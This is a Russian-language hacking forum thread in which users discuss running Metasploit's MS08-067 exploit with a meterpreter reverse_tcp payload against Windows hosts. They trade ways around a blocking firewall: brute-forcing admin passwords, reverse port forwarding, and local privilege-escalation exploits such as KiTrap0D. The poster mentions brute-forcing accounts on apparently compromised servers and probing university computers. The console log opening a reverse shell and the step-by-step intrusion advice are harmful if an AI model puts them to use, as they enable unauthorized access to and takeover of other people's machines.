ms08-67 при включенном фаерволе.

Discussion in 'Песочница' started by roman921, 6 Feb 2017.

  1. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут.
    msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
    RHOST => 192.168.0.3
    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
    LHOST => 192.168.0.1
    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse TCP handler on 192.168.0.1:4444
    [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created.

    Можно ли как-то обойти это при включенном фаерволе ?
    Какой бы еще попробовать эксплойт.
    Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят.
     
  2. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Так и не будет работать, если целевой порт сервиса закрыт фаерволом.
     
    binarymaster likes this.
  3. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу. Но что-то типа multi handler применить если, так не прокатит ?

    Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что
    [*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.
    Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ?
     
    #3 roman921, 6 Feb 2017
    Last edited: 6 Feb 2017
  4. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Можно в фаерволе добавить правило, которое к нужному порту разрешит доступ. Я давно метасплойт не юзал, но в последнем случае скорее всего версия ОС на машине просто не подвержена уязвимости.
     
  5. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    Без прав админа вроде нельзя ?
     
  6. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Нельзя
     
  7. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис.
    Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды.
    Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.*

    Вот нашел их на гитхаб, https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local
    У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать.
     
  8. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Эти эксплойты на руби написаны, и они идут как часть msf а не самостоятельные программы. Вообще такого рода вопросы можно на форуме метасплойта и задавать.
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,688
    Likes Received:
    10,074
    Reputations:
    125
    Если есть юзерский аккаунт, можно с него попробовать пробрутить админский.
    Если брут не прокатит, ещё можно от юзера по реверсу пробросить 139/tcp и 445/tcp порты, куда-то. И msf-ом атаковать уже проброшенные порты.

    Дальше вопрос только в том, чтобы начинка дала бэк-коннект на правильный IP и порт.
     
  10. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    Обычно через nt-passworder ставлю на 5-7 цифр бруты, на одном дедике у многих юзеров оказались пассы 4,5 цифр, а админы не поддались. Интересно почему так, юзеры у админов просят простые им пассы ставить ? А сами админы себе видать сложное ставят.
    Ну вот такая идея как раз о пробросе я и думал, но это я так понимаю нужно в роутер попасть.

    Кстати на 2008 и 7 прокатывали локальные эксплойты kitapr0d, ms16-032, potato, flatenrec, taihou64 это вот то что вспомнил, вроде еще какие-то пробовал.
    А на 2003 чет не получается, которые с r2 sp2.
    Может кто делал подборку эксплойтов собранных для повышения прав, заметил, что в exploit-db эти эксплойты часто надо доправлять по мелким ошибкам, к примеру, многие там почему-то забывают выделять память указателям структур)
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,688
    Likes Received:
    10,074
    Reputations:
    125
    Лучше брутить словарём, цифровые пароли на Windows юзеры ставят реже.
    Нет, речь идёт о реверс-соединении к портам, используя различные реверсеры, либо встроенную возможность начинки meterpreter (там есть команда portfwd, начинка входит в состав msf).
    Хороший выбор. KiTrap0D на NT 5.1 и 5.2 срабатывает практически всегда.
     
  12. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    Проблема в том что nt passworder не поддерживает словари, какую бы взять прогу, где словари можно было бы. Чтобы также из под юзера можно было бы поставить брут.
    Еще вспомнил про multi handler, из-за серого ипишника 192.168 как бы настроить его.
     
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,688
    Likes Received:
    10,074
    Reputations:
    125
    Попробуйте это:
    http://rgho.st/6CHz9D4tb

    Одна из моих старых частично заброшенных разработок.
    Если память не подводит, эту начинку ещё не испытывал.
     
  14. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    Это когда есть доступ к машине, то генерируешь бэкдор в метасплойт и его там запускаешь, он открывает сессию для метасплойта. А дальше можно вызывать локальные эксплойты из метасплойта, но из-за серого ip походу проще перекомпилить их в экзешники и притащить туда.

    Тут еще про удаленные компы, вот заметил в универе класс компов, туда в учетки преподы заходят по логину-пассу корпоративной почты.
    Но в lusrmgr.msc их логинов нету, а папки в users их есть, винда 7, вот как их так спрятали интересно. В net user их тоже нету. А dsa.msc не открылась на тех компах, думал доменные юзеры.
     
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,688
    Likes Received:
    10,074
    Reputations:
    125
    Не проще. Потому что эксплойты msf для этого просто не предназначены, они зависят от множества внутренних интерфейсов, предоставляемых фреймворком.

    Реальный вариант - искать C/C+ исходники этих же эксплойтов, либо уже скомпилированные программы.
     
  16. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    315
    Likes Received:
    22
    Reputations:
    0
    Я имел ввиду взять их исходники не из метасплойта, а из базы exploit-db, там с++ код у большинства.
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,688
    Likes Received:
    10,074
    Reputations:
    125
    А, это другое дело.